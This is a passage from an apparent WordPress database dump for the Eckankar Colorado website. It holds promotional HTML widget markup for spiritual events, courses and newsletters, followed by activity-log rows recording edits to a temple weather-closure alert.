3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238522,40533,'widget_id_base','custom_html'),(238523,40533,'widget_name_translated','Custom HTML'),(238503,40531,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: #ffffff 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238502,40531,'sidebar_id','null'),(238501,40531,'widget_name_translated','Custom HTML'),(238500,40531,'widget_id_base','custom_html'),(238499,40530,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238498,40530,'_server_remote_addr','76.130.120.x'),(238497,40530,'_user_email','nada@zipnadanot.org'),(238496,40530,'_user_login','S8zhaBda'),(238495,40530,'_user_id','2'),(238494,40530,'_message_key','widget_edited'),(238493,40530,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: #ffffff 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238492,40530,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: #ffffff 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238491,40530,'sidebar_id','null'),(238490,40530,'widget_name_translated','Custom HTML'),(238489,40530,'widget_id_base','custom_html'),(238487,40529,'_server_remote_addr','76.130.120.x'),(238488,40529,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238486,40529,'_user_email','nada@zipnadanot.org'),(238485,40529,'_user_login','S8zhaBda'),(238483,40529,'_message_key','widget_edited'),(238484,40529,'_user_id','2'),(238482,40529,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: #ffffff 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238481,40529,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: #ffff 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238480,40529,'sidebar_id','null'),(238479,40529,'widget_name_translated','Custom HTML'),(238478,40529,'widget_id_base','custom_html'),(238477,40528,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238475,40528,'_user_email','nada@zipnadanot.org'),(238476,40528,'_server_remote_addr','76.130.120.x'),(238474,40528,'_user_login','S8zhaBda'),(238473,40528,'_user_id','2'),(238472,40528,'_message_key','widget_edited'),(238471,40528,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: #ffff 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238470,40528,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: # 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238469,40528,'sidebar_id','null'),(238467,40528,'widget_id_base','custom_html'),(238468,40528,'widget_name_translated','Custom HTML'),(238466,40527,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238465,40527,'_server_remote_addr','76.130.120.x'),(238464,40527,'_user_email','nada@zipnadanot.org'),(238463,40527,'_user_login','S8zhaBda'),(238462,40527,'_user_id','2'),(238461,40527,'_message_key','widget_edited'),(238460,40527,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: # 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238458,40527,'sidebar_id','null'),(238459,40527,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238457,40527,'widget_name_translated','Custom HTML'),(238456,40527,'widget_id_base','custom_html'),(238453,40526,'_user_email','nada@zipnadanot.org'),(238454,40526,'_server_remote_addr','76.130.120.x'),(238455,40526,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238452,40526,'_user_login','S8zhaBda'),(238451,40526,'_user_id','2'),(238450,40526,'_message_key','widget_edited'),(238449,40526,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: 